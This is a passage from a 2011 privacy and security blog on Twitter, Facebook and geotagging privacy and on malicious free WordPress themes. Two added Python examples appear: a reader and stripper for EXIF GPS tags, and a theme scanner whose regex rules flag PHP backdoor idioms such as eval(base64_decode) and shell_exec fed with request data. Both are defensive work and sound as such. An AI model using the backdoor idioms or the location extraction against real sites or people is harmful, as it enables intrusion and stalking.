But here's a bit of meta-lulz: <a href="http://nakedsecurity.sophos.com/2011/06/21/lulzsec-scam-facebook/">LulzSec scam discovered on Facebook - but it's not what you think</a>. The excellent Graham Cluley discovers a Facebook scam that purports to have a picture of a LulzSec suspect, and then he sleuths out that the pixelated bait picture is, in fact, of another hacker arrested in 2008. <br />
<br />
This means that LulzSec is apparently now so newsworthy that potential pictures of them can be used as bait for Facebook scams. They're up there with <a href="http://nakedsecurity.sophos.com/2011/06/17/the-president-is-finally-taking-charge-no-a-facebook-phishing-attack/">Obama</a>, <a href="http://nakedsecurity.sophos.com/2011/06/01/rihanna-hayden-panettiere-lesbian-sex-video-mac-malware-facebook/">celebrity sex tapes</a> and the ever-popular <a href="http://nakedsecurity.sophos.com/2011/05/16/facebook-dislike-button-spreads-fast-but-is-a-fake-watch-out/">dislike button</a>. <br />
<br />
I don't know about you, but I got a great chuckle out of the thought that LulzSec might be as popular as <a href="http://nakedsecurity.sophos.com/2011/06/18/amazing-orgasm-facebook-scam/">orgasms</a>... at least when it comes to scam bait. <br />
<br />
And to end with more lulz, here's my favourite LulzSec tweet of today, which came in the midst of explaining what they had and hadn't actually hacked as the media attributes everything and anything to them:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://twitter.com/#!/LulzSec/status/84019077894516737" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="107" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitX5YxnAX985vHJCBYhsPbpRUus-8bImLP0qFSE3Yzzei_hNZMPUpfm2MKZJH4R66hxU4yFiN-CjcGNHVcJqCu_VUOsDOGLt_bFNDrKbgNJjr4IxiZB4RxEBCbjfzFYITJxNCYl0Ot7q8/s400/lulz-sun.png" alt="@LulzSec: Though we did attack the actual sun... that bitch was down all last night." title="@LulzSec: Though we did attack the actual sun... that bitch was down all last night."
/></a></div><br />
<br />
<h1>News: Experts recommend stronger protections for "Geodata"</h1>
(Terri Oda, 2011-04-07)<br />
Interesting article: <a href="http://www.sciencedaily.com/releases/2011/04/110404084801.htm">Personal 'Geo Data' as Sensitive as Private Genetic Information, Experts Argue</a><br />
<br />
<blockquote>Currently, no consensus exists for the definition of "sensitive data" in data protection and privacy law either in the EU or the USA. However, given the status of both regions as major trading partners it is essential in the digital age that such consensus is formed soon while legislation is in a transitional period. Consistent legislation would not only protect consumers and sellers, but also improve confidence across the whole of e-commerce and mobile computing.</blockquote><br />
That's perfectly true and reasonable. But I'm less thrilled about the example of why it might be sensitive:<br />
<br />
<blockquote>Jessen points out in what particular situation geo-tracking might be most sensitive. "The intrusion and loss of integrity related to the processing of geographic location data are apparent when customers are subject to constant monitoring or when geographic location data are combined with other sensitive or demographic data, such as the location of bars, casinos, red-light districts," she says. She adds that "Personal profiles are established for behavioural advertising purposes on this basis." Even anonymised location data might compromise an individual's privacy, so it too must be subsumed in new privacy legislation.</blockquote><br />
Red light districts? Once again, <a href="http://webinsecurity.blogspot.com/2010/08/privacy-not-just-for-people-who-are.html">privacy is not just for people who have something to hide</a>, news writers and legislators. Surely, someone can come up with some other convincing reasons for geodata to be sensitive that don't make it sound like you're protecting only compulsive gamblers, alcoholics, and others who could be conceived of as doing something not entirely socially appealing? Especially if you're then going to try to convince the US to provide consistent legislation, it seems some other examples could be helpful in making the case.<br />
<br />
<h1>Comprehensive Guide to Twitter Privacy: Where are you?</h1>
(Terri Oda, 2011-03-31)<br />
I've become fascinated with how Twitter has such simple settings, and yet Twitter privacy is in many ways quite complex, so I'm starting to put all of this information together. This is part 2 of... a bunch. <br />
<br />
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy.html">Part 1: Who hears what you say?</a>]<br />
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy_31.html">Part 2: Where are you?</a>] <-- you are here!
<p><br />
<br />
<br />
Now read on to learn <strong>How your iPhone may be letting people know where you live</strong> and what being responsible about sharing your location really entails!<br />
<br />
<h2>Part 2: Where are you?</h2><p>A year ago, I talked about <a href="http://webinsecurity.blogspot.com/2010/02/foursquare-for-thieves-and-privacy.html">How Foursquare can help people steal your stuff</a>. Someone had set up a handy site called <a href="http://pleaserobme.com">PleaseRobMe.com</a> which let you search to find out who in a given area wasn't at home based on their Foursquare checkins. (The site now says that the authors have made their point about oversharing and have disabled the search.) <p>The point being that while sharing your location can be a neat way to meet up with friends, it can also be used in dangerous ways. So whether it's Foursquare, Yelp, Facebook Places, Google Latitude, or Twitter, you need to think about what you're sharing and why. <h3>Twitter's built-in location settings</h3><p>At the time I wrote about PleaseRobMe.com, I don't think location was built into Twitter, but it's since been made an option for any Twitter post. I have to say that I really like how Twitter has made this option clear... 
including doing their best to make it possible to recover from an "oops" moment where you realise you've been sharing waaay too much information and want to delete all the location data to be safe: <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjJ17EX4vvO1bvGwf21MyeZu4t4bjAVQN5wRRgQDrZ-QVqunjzaphJRvzRKv4lYX6JRbaDKDYEjqmbgUEapb15orrNeRtovLayG_P_hyphenhyphenYyxvdeS31LTecIpG0sdz13BNTtHcoB-xjfiSU/s1600/twitterlocation.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="166" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjJ17EX4vvO1bvGwf21MyeZu4t4bjAVQN5wRRgQDrZ-QVqunjzaphJRvzRKv4lYX6JRbaDKDYEjqmbgUEapb15orrNeRtovLayG_P_hyphenhyphenYyxvdeS31LTecIpG0sdz13BNTtHcoB-xjfiSU/s400/twitterlocation.png" /></a></div>They've also done a nice job with the <a href="http://support.twitter.com/forums/26810/entries/78525">"Learn more" help document</a>, which includes the following message: <blockquote><strong>Be cautious and careful about the amount of information you share online.</strong> There may be some updates where you want to share your location ("The parade is starting now." or "A truck just spilled delicious candy all over the roadway!"), and some updates where you want to keep your location private. <strong>Just like you might not want to tweet your home address, please be cautious in tweeting coordinates you don't want others to see.</strong></blockquote><p>That pretty much sums up the advice any security/privacy expert would give you, although the <a href="http://support.twitter.com/forums/26810/entries/78525">complete document</a> also explains how to turn things on and off, when one might prefer a precise location and when one might prefer just the city, etc. 
<p>But just like with <a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy.html">the tweet privacy settings we talked about in part 1</a>, this isn't the only way your location can be shared. Only this time, we're not going to blame your followers... we're going to blame your camera. <h3>How your iPhone may be telling everyone where you live</h3><p>Many modern smartphones and cameras, including the iPhone, have a GPS receiver built in and can record the coordinates in each photo's metadata. That's pretty cool when it comes to sorting photos later, but because this information travels with the file, each picture you share could potentially tell someone exactly where you are (or were when you took the photo). <p>In <a href="http://www.usenix.org/events/hotsec10/tech/full_papers/Friedland.pdf">Cybercasing the Joint: On the Privacy Implications of Geo-Tagging</a>, Friedland and Sommer looked at how many people share location data, whether they did so in unsafe ways, and whether they were aware of what information they were sharing. I highly recommend you flip through <a href="http://www.usenix.org/events/hotsec10/tech/slides/friedland.pdf">their HotSec presentation</a> to look at the examples. (Even better if you can catch them presenting -- I really enjoyed seeing that presentation in person! -- but the slides are pretty informative on their own.) <br />
<br />
<p>My favourite one involves William Shatner accidentally revealing a "secret" studio location when he posted about recording there! And perhaps more relevant to "cybercasing the joint" are the craigslist posts that show expensive items, their exact geolocation, and the list of times when someone will be at home to take a phone call from an interested buyer. <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMdHLVnyjsJSaWcQWoO4TXenxpP-h-_-IfOqgYtLRS9jZRX-qE3rGIdrTLLNJZ9WewzS-rsHunkN3N3cM-vqk75mcfjwJt067DPxExKOPRVXpIrOhn0WA4lvZm3x93m_FCZ1ZpdxnN7Ng/s1600/twitpic.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="155" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMdHLVnyjsJSaWcQWoO4TXenxpP-h-_-IfOqgYtLRS9jZRX-qE3rGIdrTLLNJZ9WewzS-rsHunkN3N3cM-vqk75mcfjwJt067DPxExKOPRVXpIrOhn0WA4lvZm3x93m_FCZ1ZpdxnN7Ng/s400/twitpic.png" /></a></div><p>The issue here is that geodata is often recorded by default. And it can even be dangerous to share this information. As a parent, how would you feel if you realized your teenage daughter had been taking photos of herself in her bedroom and it turned out that any predator could figure out where she lived? How do you feel about the fact that your friends' photos from your last party may have told everyone on the internet where you live? <div class="separator" style="clear: both; text-align: center;"><a href="http://www.flickr.com/photos/lalakis/3238750109/" title="Untitled by Lauren Lakis, on Flickr"><img src="http://farm4.static.flickr.com/3257/3238750109_be60c05e14_m.jpg" width="240" height="127" alt=""></a></div><p>Many photo services, such as Twitpic and Flickr, allow you to generalize your data so that it shows up as being in a city without showing precisely where within that city. 
But if you choose to have it visible (or just don't hide the data), you can often get a nice map where you can zoom in: <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_FYCfzjs2fLwxgbR2XrGpHuIJPKQhmtsw84xFh_UDzn3875ctBw5qKAgfhkJhAsRVNHrlPcE7T9jZj4ZCtVzYN70cOIDL-qZaOCswwk-8znxNLyzdgL-5GzTjqK5MS1tMkmA9xhimeV4/s1600/flickr-map.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="178" width="319" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_FYCfzjs2fLwxgbR2XrGpHuIJPKQhmtsw84xFh_UDzn3875ctBw5qKAgfhkJhAsRVNHrlPcE7T9jZj4ZCtVzYN70cOIDL-qZaOCswwk-8znxNLyzdgL-5GzTjqK5MS1tMkmA9xhimeV4/s400/flickr-map.png" /></a></div><p>On Flickr you can view the EXIF data (Exchangeable image file format: the metadata block a camera embeds in each photo, which can include the GPS coordinates) and get the coordinates there... <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBTLEuhmJFRICbXvx1KvnOc9EPIb-E-9vsxr5skMy2qr7XywbtA2Vvcqrdxm5IhrSVmUahjm-BPWxToX8gJ0ZmdAz87kAq1nEO3awtPBUb_6U31qAYTbDIGEm59z3LO5Blbwnwl81UMV4/s1600/flickr-gps.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="142" width="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBTLEuhmJFRICbXvx1KvnOc9EPIb-E-9vsxr5skMy2qr7XywbtA2Vvcqrdxm5IhrSVmUahjm-BPWxToX8gJ0ZmdAz87kAq1nEO3awtPBUb_6U31qAYTbDIGEm59z3LO5Blbwnwl81UMV4/s400/flickr-gps.png" /></a></div><p>All ready for someone's stalking pleasure! <p><h3>The moral of this story</h3><p>Sharing your location can be scary, and protecting your location privacy doesn't stop at turning off location on Twitter or refusing to sign in to Foursquare/Facebook Places/Yelp. If you don't want everyone to know exactly where you are, you also have to make sure your camera and your friends' cameras aren't giving the game away. Check whether your camera records location at all, and don't assume a site strips it on upload: some do and some pass the file through untouched.<br />
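<p>To make the EXIF threat concrete, here is an added example (my code, not anything from this post, from Flickr or from Twitpic) that builds a tiny JPEG carrying nothing but a GPS block, reads the coordinates back the way a photo site or a stalker would, strips the block before upload, and can re-tag the photo at roughly city-level precision instead. The photo and its coordinates are constructed for the example and the file is not a viewable picture; the tag numbers and byte layout are the standard EXIF/TIFF ones.</p>

```python
import struct

# Added example, not code from the post: build a JPEG that carries only an EXIF
# GPS block, read the coordinates back, strip them, or coarsen them to roughly
# city level. Constants are the standard EXIF/TIFF ones; the photo is
# constructed and is not a decodable picture.
GPS_INFO_TAG = 0x8825                   # IFD0 entry that points at the GPS sub-IFD
ASCII, LONG, RATIONAL = 2, 4, 5         # TIFF field types used here
TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1}
EXIF_HEADER = b"Exif\x00\x00"


def _dms(value):
    """Decimal degrees -> degrees, minutes, seconds as three big-endian rationals."""
    value = abs(value)
    deg = int(value)
    minutes = int((value - deg) * 60)
    milliseconds = round(((value - deg) * 60 - minutes) * 60 * 1000)
    return struct.pack(">IIIIII", deg, 1, minutes, 1, milliseconds, 1000)


def build_gps_jpeg(lat, lon):
    """Constructed file: SOI, one APP1/Exif segment holding a GPS IFD, EOI."""
    gps_ifd_off = 8 + 2 + 12 + 4                 # header + IFD0 with one entry
    data_off = gps_ifd_off + 2 + 4 * 12 + 4      # GPS IFD with four entries

    def entry(tag, typ, count, value):           # one 12-byte IFD entry
        return struct.pack(">HHI", tag, typ, count) + value

    ifd0 = (struct.pack(">H", 1)
            + entry(GPS_INFO_TAG, LONG, 1, struct.pack(">I", gps_ifd_off))
            + struct.pack(">I", 0))
    gps = (struct.pack(">H", 4)
           + entry(1, ASCII, 2, b"N\0\0\0" if lat >= 0 else b"S\0\0\0")
           + entry(2, RATIONAL, 3, struct.pack(">I", data_off))
           + entry(3, ASCII, 2, b"E\0\0\0" if lon >= 0 else b"W\0\0\0")
           + entry(4, RATIONAL, 3, struct.pack(">I", data_off + 24))
           + struct.pack(">I", 0))
    tiff = b"MM\x00\x2a" + struct.pack(">I", 8) + ifd0 + gps + _dms(lat) + _dms(lon)
    app1 = EXIF_HEADER + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def _segments(jpeg):
    """Yield (marker, start, end) for each marker segment up to SOS or EOI."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker == 0xD9:                       # EOI
            return
        end = pos + 2 + struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        yield marker, pos, end
        if marker == 0xDA:                       # SOS: entropy-coded data follows
            return
        pos = end


def _is_exif(jpeg, marker, start):
    return marker == 0xE1 and jpeg[start + 4:start + 10] == EXIF_HEADER


def _read_ifd(tiff, off, e):
    """Return {tag: (type, count, raw value bytes)} for the IFD at off."""
    entries = {}
    for i in range(struct.unpack(e + "H", tiff[off:off + 2])[0]):
        at = off + 2 + 12 * i
        tag, typ, count = struct.unpack(e + "HHI", tiff[at:at + 8])
        raw = tiff[at + 8:at + 12]
        size = TYPE_SIZE.get(typ, 1) * count
        if size > 4:                             # too big to be inline: raw is an offset
            start = struct.unpack(e + "I", raw)[0]
            raw = tiff[start:start + size]
        entries[tag] = (typ, count, raw)
    return entries


def _to_degrees(e, ref, dms):
    d = struct.unpack(e + "IIIIII", dms)
    value = d[0] / d[1] + d[2] / d[3] / 60 + d[4] / d[5] / 3600
    return -value if ref[:1] in (b"S", b"W") else value


def gps_from_jpeg(jpeg):
    """Return (lat, lon) in decimal degrees, or None when the file has no GPS tags."""
    for marker, start, end in _segments(jpeg):
        if not _is_exif(jpeg, marker, start):
            continue
        tiff = jpeg[start + 10:end]
        e = ">" if tiff[:2] == b"MM" else "<"    # byte order from the TIFF header
        ifd0 = _read_ifd(tiff, struct.unpack(e + "I", tiff[4:8])[0], e)
        if GPS_INFO_TAG not in ifd0:
            return None
        gps = _read_ifd(tiff, struct.unpack(e + "I", ifd0[GPS_INFO_TAG][2])[0], e)
        if not all(t in gps for t in (1, 2, 3, 4)):
            return None
        return _to_degrees(e, gps[1][2], gps[2][2]), _to_degrees(e, gps[3][2], gps[4][2])
    return None


def strip_exif(jpeg):
    """Drop every APP1/Exif segment; copy all other segments and scan data verbatim."""
    out, pos = bytearray(b"\xff\xd8"), 2
    for marker, start, end in _segments(jpeg):
        if not _is_exif(jpeg, marker, start):
            out += jpeg[start:end]
        pos = end
    return bytes(out + jpeg[pos:])


def coarsen_gps(jpeg, places=1):
    """Strip the EXIF, then re-tag with coordinates rounded to `places` decimals
    (one decimal is roughly 11 km, i.e. "somewhere in this city")."""
    coords = gps_from_jpeg(jpeg)
    clean = strip_exif(jpeg)
    if coords is None:
        return clean
    rough = build_gps_jpeg(round(coords[0], places), round(coords[1], places))
    return clean[:2] + rough[2:-2] + clean[2:]
```

<p>The reader honours whichever byte order the TIFF header declares, and the stripper copies every non-EXIF segment and the scan data through untouched, so the same functions apply to a real camera file. Stripping also drops the camera model and timestamps, which is usually what you want before a photo goes anywhere public.</p>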
<br />
<p>Stay tuned for more Twitter privacy posts in April! And in case you missed it, here's [<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy.html">Part 1: Who hears what you say?</a>] which talks about tweet privacy.</p>
<p>Posted by Terri Oda.</p>
<p><strong>Comprehensive Guide to Twitter Privacy: Who hears what you say?</strong> (2011-03-07)</p><h1>Comprehensive Guide to Twitter Privacy</h1><br />
I've become fascinated with how Twitter has such simple settings, and yet Twitter privacy is in many ways quite complex, so I'm starting to put all of this information together. This is part 1 of... many.<br />
<br />
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy.html">Part 1: Who hears what you say?</a>] <-- you are here!
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy_31.html">Part 2: Where are you?</a>]<br />
<br />
Note that many of the things I'm saying here are true of other social networks or any place you might share information online, but I decided this would be most readable with examples from one site, so I've decided to use Twitter, which I like and use regularly.<br />
<br />
<h2>Part 1: Who hears what you say?</h2><br />
On the surface, Twitter has perhaps the simplest privacy policy of any social network:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRfLAbDTXuAsFa1Cd9hH8NsZYrIR1tzzYeiywpSDqOt9z7riCKvTR-sXwRT1jhC6233HNNIZBMhYsLsZsWnLjN8ep4dYfeAp8d71DBMUXYhQpGxNioCLxpF9-PsbeLodMPPJUKtFMdqcI/s1600/twitterprivacy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRfLAbDTXuAsFa1Cd9hH8NsZYrIR1tzzYeiywpSDqOt9z7riCKvTR-sXwRT1jhC6233HNNIZBMhYsLsZsWnLjN8ep4dYfeAp8d71DBMUXYhQpGxNioCLxpF9-PsbeLodMPPJUKtFMdqcI/s400/twitterprivacy.png" width="400" /></a></div><br />
Either everyone can read your tweets (everything you say on twitter is public) or you can make your feed private (and then maintain a list of people who are allowed to see it). <br />
<br />
You also, regardless of which option you choose, have the option of blocking individuals from following you. Blocking someone isn't hugely effective if they can then log out and read your public feed anyhow, but it can cut down on spam.<br />
<br />
<h3>Retweeting</h3><br />
Blocking everyone you don't know is not necessarily the end of the story. Just like gossip, anyone who can read what you've said can also share it. It's fairly common in twitter parlance to "retweet" a message: that is, repeat the message verbatim or sometimes with small edits for length or the addition of commentary. <br />
<br />
When you have a public account, retweeting is pretty much harmless behaviour. Anyone could see that funny thing you said if they looked, so if one of your followers retweets it, you're really just winding up with a few more strangers seeing it than you might otherwise. But they could have looked at that tweet at any time if they so chose. Often it's a really positive thing: more people get to hear about a cause you believe in or something cool you've done. <br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1fz-cAhFFzqMtj-XWH0x2XA5TBtVslZUiRaNdpsLR8LBhyphenhyphenXEeYOMrCFph5Cl1AuSckbuMhQQAmjvhlEIKbyFOMwlOcI5WFu4CSfSKm64JXRWUKpOxmVjuyFsFTkXtYnt1WNFOUEw1Acw/s1600/retweet.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="130" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1fz-cAhFFzqMtj-XWH0x2XA5TBtVslZUiRaNdpsLR8LBhyphenhyphenXEeYOMrCFph5Cl1AuSckbuMhQQAmjvhlEIKbyFOMwlOcI5WFu4CSfSKm64JXRWUKpOxmVjuyFsFTkXtYnt1WNFOUEw1Acw/s400/retweet.png" /></a></div><br />
However, the story can be quite different if you have a private account. Perhaps you have chosen to keep your account private because you and your boss don't share political views. That "funny" thing you said could become seriously awkward if she winds up seeing it retweeted. Probably you chose to make your account private for a reason, and retweets can violate your expectation of privacy.<br />
<br />
<h3>Violating privacy with retweets?</h3><br />
There's actually a whole paper on this subject that appeared in Web 2.0 Security and Privacy 2010. It has the cheesy-cute title <a href="http://w2spconf.com/2010/papers/p28.pdf">RT @IWantPrivacy: Widespread Violation of Privacy Settings in the Twitter Social Network</a>. They found that while some clients did block users from retweeting private feeds, many didn't, and of course users could always just type RT and repeat the whole message anyhow. <b>The researchers collected 4.42 million tweets that were exposing private information</b> in this manner, and they expect the numbers to continue to climb. <br />
<br />
It's hard to tell, however, whether those millions of exposed tweets were really problematic for the people who wound up exposed. Perhaps millions of people asked before retweeting (something you should always do before sharing private information, but I know even I forget to do this sometimes when telling a good story I heard, so I suspect retweeting is no different). Perhaps most of the tweets were cute pictures of cats that no one really minded sharing. But either way, you should be aware of what you retweet and aware of what you say that could be retweeted.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://www.flickr.com/photos/josefdunne/4319306255/" title="RETWEET @josef (Experiment) by Josef Dunne, on Flickr"><img src="http://farm3.static.flickr.com/2707/4319306255_13bfe7562b_m.jpg" width="240" height="160" alt="RETWEET @josef (Experiment)" /></a></div><br />
<h3>Retweeting lies</h3><br />
It's also worth noting that even though the researchers assumed that most of those tweets were actual privacy exposures, it's equally possible that many of them were made up. If someone can type RT and your name and then paste in a message, there's no reason it has to be <em>your</em> message that they paste in. Often edits are minor, but there's nothing stopping one from going <code>RT @twitter we hate kittens</code> or something significantly more damaging to someone's reputation. Without a public feed, it's hard to refute since no one can check what you said, and even with a public feed people may assume that you deleted the offending message. <a href="http://www.rttnews.com/Content/EntertainmentNews.aspx?Section=2&Id=1569700&SM=1">A recent defamation lawsuit</a> in the US may serve as a reminder that what you say and what you seem to say on Twitter could have real implications.<br />
<br />
So that little checkbox? It's clearly not the end of the story.<br />
<br />
Stay tuned for Part 2 next week!<br />
<br />
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy.html">Part 1: Who hears what you say?</a>] <-- you are here!
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy_31.html">Part 2: Where are you?</a>]<br />
<p>Posted by Terri Oda.</p>
<p><strong>News: Facebook still going to share your address/phone # with external sites</strong> (2011-03-01)</p><div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/terrio/4920679942/" title="Old Facebook home page"><img src="http://farm5.static.flickr.com/4073/4920679942_8efb2881b2_m.jpg" alt="Old Facebook home page" style="border: solid 2px #000000;" /></a><br /> <span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/terrio/4920679942/">Old Facebook home page</a> <br />by <a href="http://www.flickr.com/photos/terrio/">Terriko</a>.</span></div>Over a month ago, I wrote <a href="http://webinsecurity.blogspot.com/2011/01/facebook-enabling-annoying-phone-calls.html">Facebook now enabling annoying phone calls and paper junk mail?</a> and shortly thereafter they pulled the plan. <br />
<br />
But <a href="http://www.huffingtonpost.com/2011/02/28/facebook-home-addresses-phone-numbers_n_829459.html">it sounds like it's back on the table</a>, along with <a href="http://gadgetwise.blogs.nytimes.com/2011/03/01/facebook-facelifts-its-privacy-policy/?src=busln">an updated privacy policy format</a>.<br />
<br />
Given that anyone can buy a targeted Facebook advertisement, is this going to lead to new levels of stalking and general harassment from "advertisers" who think it's totally worth a few bucks to get the phone numbers of all the women they might find attractive in their metro area? Awkward.<br />
<br />
As usual, I recommend not having private contact information available in Facebook for your own safety.<br />
<p>Posted by Terri Oda.</p>
<p><strong>To whom are you confessing?</strong> (2011-02-15)</p>Many people have been abuzz over the <a href="http://itunes.apple.com/us/app/confession-a-roman-catholic/id416019676?mt=8&ls=1">iPhone Confession App</a> which even <a href="http://www.bbc.co.uk/news/technology-12391129">received approval from the church</a>.<br />
<br />
The <a href="http://www.priv.gc.ca/">Office of the Privacy Commissioner of Canada</a> <a href="http://blog.privcom.gc.ca/index.php/2011/02/09/fess-up-where-does-my-data-go/">isn't ready to give the app their blessing</a>, though:<br />
<br />
<blockquote><div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/jessgarduno/4748397648/" title="Confessions"><img src="http://farm5.static.flickr.com/4098/4748397648_c7e1bf29fd_m.jpg" alt="Confessions" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/jessgarduno/4748397648/">Confessions</a> <br />
by <a href="http://www.flickr.com/photos/jessgarduno/">jess.g.</a>.</span></div>One of the selling points of the app appears to be the password-protection feature, enabling you to lock out anyone who may try to find out about your sinnin’ ways. But what seems to be missing is what Little iApps, the developer of Confession, will do with the data they collect. According to reports, the app asks users to also provide information on their age, sex and marital status – paired with detailed information on the user’s transgressions, that’s a potentially detailed profile that would be quite attractive to marketers and others.<br />
<br />
Details on the collection and use of the user-provided data wasn’t available on Little iApps’ site…so if the developer is collecting and using information without the user knowing, does that mean they’ve broken one of the commandments themselves – “Thou shalt not steal”?</blockquote><br />
Read their entire blog post entitled <a href="http://blog.privcom.gc.ca/index.php/2011/02/09/fess-up-where-does-my-data-go/">‘Fess up – where does my data go?</a><br />
<p>Posted by Terri Oda.</p>
<p><strong>Free Wordpress themes considered harmful</strong> (2011-02-14)</p>It used to be that you could tell what was likely to give your computer a virus: if you stayed away from the porn and "free screensavers" then you were pretty much ok. Nowadays, though, with cross-site scripting, it's <a href="http://www.cgisecurity.com/xss-faq.html#xss">much harder to gauge which content might be unsafe</a>.<br />
<br />
So <a href="http://wpmu.org/why-you-should-never-search-for-free-wordpress-themes-in-google-or-anywhere-else/">Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else</a> caught my eye because it's a new example of how free... sometimes isn't. Why bother to exploit people's WordPress blogs, which is illegal in many places, when you can just give them the code and let them install and run it themselves? A theme is PHP that runs on your server with whatever access your blog has, so anything hidden in it runs as you. Mostly it looks like the code found is all about adding spammy SEO-boosting links for dubious properties, but there could definitely be worse elsewhere in those themes: that free theme could be using your blog to install malicious software on your visitors' computers!<br />
<br />
<blockquote>Out of the ten sites on the first page of Google, here are the stats:<br />
<br />
Safe: 1<br />
Iffy: 1<br />
Avoid: 8<br />
8 out of 10 sites included base64 encoding in their themes. The average WordPress user no doubt knows that Google isn’t the best place to find themes but the stats on these sites show that there are thousands of people downloading them and using them on their websites. Someone who has come to WordPress for the first time is more than likely to type “free WordPress themes” into Google to find a site that gives them what they want. Unfortunately they’re more than likely to end up with spammy links, at best, on their site.</blockquote><br />
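<p>As an added example (my code, not the article's and not either plugin's), here is the basic check such tools perform: walk the theme's PHP files, flag the obfuscation and hidden-link idioms the article describes, peel apart nested <code>eval(base64_decode(...))</code> layers so you can read what a payload actually does, and sort the result into the article's safe/iffy/avoid buckets. The theme files are constructed for the example, <code>example.com</code> is a placeholder, and the rules are line-based heuristics rather than a PHP parser.</p>

```python
import base64
import re
from collections import namedtuple

# Added example, not the post's or the plugins' code: a minimal theme scanner.
# The sample theme below is constructed; example.com is a placeholder.
Finding = namedtuple("Finding", "path line label snippet")

# (pattern, label, severity): "exec" = code runs from data, "iffy" = obfuscation
# or hidden markup that deserves a human look. Line-based heuristics, so an
# expression split across lines can slip past them.
RULES = [
    (re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
     "eval(base64_decode())", "exec"),
    (re.compile(r"eval\s*\(\s*(gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     "eval of packed payload", "exec"),
    (re.compile(r"\b(eval|assert|system|passthru|shell_exec)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)", re.I),
     "request data reaches a code-execution function", "exec"),
    (re.compile(r"preg_replace\s*\(\s*['\"]\S*?/[a-z]*e[a-z]*['\"]", re.I),
     "preg_replace() with the /e modifier", "exec"),
    (re.compile(r"base64_decode\s*\(", re.I), "base64_decode() call", "iffy"),
    (re.compile(r"display\s*:\s*none[^>]*>\s*<a\s", re.I), "hidden link (SEO spam)", "iffy"),
]
SEVERITY = {label: sev for _, label, sev in RULES}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]", re.I)


def unwrap_base64(src, max_depth=8):
    """Decode nested base64_decode('...') literals; returns layers outermost first."""
    layers, current = [], src
    for _ in range(max_depth):
        m = B64_LITERAL.search(current)
        if not m:
            break
        try:
            decoded = base64.b64decode(re.sub(r"\s", "", m.group(1)), validate=True)
        except ValueError:                      # binascii.Error is a ValueError
            break
        current = decoded.decode("utf-8", "replace")
        layers.append(current)
    return layers


def _scan_text(path, text):
    return [Finding(path, n, label, line.strip()[:80])
            for n, line in enumerate(text.splitlines(), 1)
            for pattern, label, _ in RULES if pattern.search(line)]


def scan_theme(files):
    """files: {relative path: PHP source}. Decoded payload layers are scanned too."""
    findings = []
    for path, src in sorted(files.items()):
        findings += _scan_text(path, src)
        for depth, layer in enumerate(unwrap_base64(src), 1):
            findings += _scan_text("%s (decoded layer %d)" % (path, depth), layer)
    return findings


def verdict(findings):
    """The article's buckets: avoid / iffy / safe."""
    sevs = {SEVERITY[f.label] for f in findings}
    return "avoid" if "exec" in sevs else "iffy" if "iffy" in sevs else "safe"


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# A two-layer payload of the kind the article describes, constructed here.
_INNER = "echo '<a href=\"http://example.com/\">cheap watches</a>';"
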